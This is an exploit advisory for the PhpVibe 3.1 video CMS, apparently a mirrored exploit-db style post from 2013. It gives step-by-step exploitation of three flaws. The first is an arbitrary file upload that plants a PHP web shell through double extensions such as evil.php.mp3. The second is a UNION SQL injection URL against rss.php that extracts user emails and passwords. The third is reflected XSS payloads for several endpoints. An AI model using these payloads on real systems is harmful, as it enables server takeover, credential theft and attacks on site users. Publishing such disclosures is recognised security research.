扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 |
########################################################################################### #Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilites #Product: PhpVibe #Official site: http://phprevolution.com/ #Risk Level: High #Exploit Author: Esac #Last Checked: 23/08/2013 ########################################################################################### +----------+ | OVERVIEW | +----------+ PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe
and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off. +-----------------------------------------------------------------------------------+ +-------------------------------------+ | Remote Arbitrary File Upload Vuln | +-------------------------------------+ Affected file : upload.php ............................................... if ($_FILES['file']['name']!='') { $fileName= $_FILES['file']['name']; $fileSize = $_FILES['file']['size']; $ext = substr($fileName, strrpos($fileName, '.') + 1); if (in_array($ext,$allowedExts) or empty($allowedExts)) { if ($fileSize<$maxFileSize or empty($maxFileSize)) { $target_path = $target_path . basename( $_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) { echo '{"success":true, "file": "'.$target_path.'"}'; vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name'])); } else{ echo '{"success":false, "details": "move_uploaded_file failed"}'; } } else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); }; } else echo('{"success":false, "details": "File type '.$ext.' not allowed."}'); } else echo '{"success":false, "details": "No file received."}'; real exploitation : to exploit this vuln , u must be a registred user and go to upload video area http://server/upload upload ur evil file as evil.php.mp3 or file.php.mp4 or file.php.flv Shell access : <audio class="wp-audio-shortcode" id="audio-94922-2" preload="none" style="width: 100%;" controls="controls"><source type="audio/mpeg" src="http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3?_=2" /><a href="http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3">http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3</a></audio> Demo : server/media/flv/august-23-13-5-10-pm-evil.php.flv +-----------------------------------------------------------------------------------+ +---------------+ | SQL Injection | +---------------+ PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat affected code : //rss.php , line 24 function clean_feed($input) { $original = array("<", ">", "&", '"', "'", "<br/>", "<br>"); $replaced = array("<", ">", "&", ""","'", "", ""); $newinput = str_replace($original, $replaced, $input); return $newinput; } echo'<?xml version="1.0" encoding="utf-8"?> <rss version="2.0"> <channel> '; echo ' <title>'.$seo_title.'</title> <description>'.$seo_desc.'</description> <link>'.$site_url.'</link> '; if($cat = MK_Request::getQuery('cat')) { $vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30"); } else { $vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30"); } while($videosData = mysql_fetch_array($vbox_result)) { $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/'; $rss_datetime = $videosData["date"]; echo ' <item> <title>'.strip_tags($videosData['title']).'</title> <link><![CDATA['.$url.']]></link> <guid><![CDATA['.$url.']]></guid> <pubDate>'.$rss_datetime.'</pubDate> <description>[CDATA['.clean_feed($videosData["description"]).' ]]</description> </item> '; } echo'</channel> Poc : http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users-- +--------------------------------------------------------------------------------------+ +-----------+ |XSS Attack | +-----------+ Multiple XSS vulnerabilities have been detected in phpVibe 3.1 1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. exemple : http://server/show/'">><marquee><h1>XSS</h1></marquee> 2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerabilities are reported in version 3.1. Other versions may also be affected. exemple : http://server/forgot-pass.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee> http://server/login.php => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee> http://server/register.php=> POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee> +--------------------------------------------------------------------------------------+ Knowledge is not an object , it's a flaw :) Greetz : White Tarbouch TEAM - Cobra www.Iss4m.ma ./Issam IEBOUBEN Aka Esac |
体验盒子
